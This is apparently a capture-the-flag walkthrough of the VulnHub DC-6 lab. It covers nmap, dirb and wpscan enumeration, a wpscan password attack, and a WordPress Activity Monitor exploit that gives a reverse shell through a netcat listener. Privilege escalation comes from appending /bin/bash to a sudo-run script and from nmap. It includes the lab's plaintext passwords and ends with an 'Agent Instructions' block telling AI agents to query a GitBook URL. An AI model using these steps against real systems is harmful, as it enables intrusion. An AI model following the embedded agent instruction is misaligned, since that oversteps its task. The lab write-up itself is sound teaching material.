# DC6
## Enumeration
### nmap
```
nmap -sC -sV -oA nmap/DC6 192.168.1.115
```
```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 07:20 EDT
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 100.00% done; ETC: 07:20 (0:00:00 remaining)
Nmap scan report for wordy (192.168.1.115)
Host is up (0.00016s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Wordy – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:EC:F5:FF (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.11 seconds
```
After that, as usual, we put the IP to the address bar and see what we got
We can see the URL there has a domain called wordy.
Let's navigate to the `/etc/hosts` and add the IP into it.
Reload the browser.
We got a wordpress file!
### Dirb
```
dirb http://192.168.1.115
```
```
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon May 18 07:56:05 2020
URL_BASE: http://192.168.1.115/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.115/ ----
+ http://192.168.1.115/index.php (CODE:200|SIZE:53227)
+ http://192.168.1.115/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.1.115/wp-admin/
==> DIRECTORY: http://192.168.1.115/wp-content/
==> DIRECTORY: http://192.168.1.115/wp-includes/
+ http://192.168.1.115/xmlrpc.php (CODE:405|SIZE:42)
```
As we can see we can navigate to `wp-admin` and it will redirect us to the login form.
After poking around I still can't find anything interesting
### wpscan
```
wpscan --url http://wordy --enumerate u
```
```
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://wordy/ [192.168.1.115]
[+] Started: Mon May 18 08:00:12 2020
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://wordy/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
| Found By: Rss Generator (Passive Detection)
| - http://wordy/index.php/feed/, https://wordpress.org/?v=5.1.1
| - http://wordy/index.php/comments/feed/, https://wordpress.org/?v=5.1.1
[+] WordPress theme in use: twentyseventeen
| Location: http://wordy/wp-content/themes/twentyseventeen/
| Last Updated: 2020-03-31T00:00:00.000Z
| Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.3
| Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==============================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Mon May 18 08:00:15 2020
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 13.316 KB
[+] Data Received: 640.55 KB
[+] Memory used: 172.594 MB
[+] Elapsed time: 00:00:03
```
We can see that there are 5 usernames available, admin, graham, mark, sarah and jens.
Let's put it inside a text file.
We can see from the [vulnhub](https://www.vulnhub.com/entry/dc-6,315/#) site, the author gave us a clue about getting a new password.txt so that we don't need to waste our time on brute-forcing it.
Then at wpscan, type
```
wpscan http://192.168.1.115/wp-login --usernames name.txt --passwords pass.txt
```
Then we can run the command
We get a username and password and that is `mark` and `helpdesk01`
Let's login to the wordpress
We've successfully logged in to the account.
## Exploitation
### Searchsploit
Since we got the Activity monitor plugins, so I went to `searchsploit` to search for the exploit.
The exploit that what we want is the third one.
Copy the file to a directory that we can access later.
Then `nano` into that file
We can see that there is a reverse shell will be called after we execute the file.
Change the URL from `localhost` to `wordy` and the reverse shell to your IP and the port that you want to put.
We first set up the listener at our machine
```
nc -nlvp 4444
```
Then open the file
Click submit request
Then we got a shell, type
```
python -c 'import pty; pty.spawn("/bin/bash")'
```
to get a proper shell.
Then navigate to /home/mark/stuff. We got a file called things-to-do.txt
Open up and we will see something inside.
We see that there is a `graham` user and his password, `GSo7isUM1D4`. Let's logout and ssh to `graham`
## Privilege Escalation
When we type `sudo -l`, we can see this
It seems like we need `jens` user to run this thing.
Append `/bin/bash` to the `backups.sh` file in order to let us get a shell when we switch to `jens` user
Then, type
```
sudo -u jens /home/jens/backups.sh
```
We successfully got to `jens` user, then we type `sudo -l` again and got this
We can go to the [site](https://gtfobins.github.io/) and search for nmap
Follow the instruction given
We got root !
Navigate to the /root to get the flag
Congratulation !
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://choochisiang.gitbook.io/report/vulnhub/dc/dc6.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.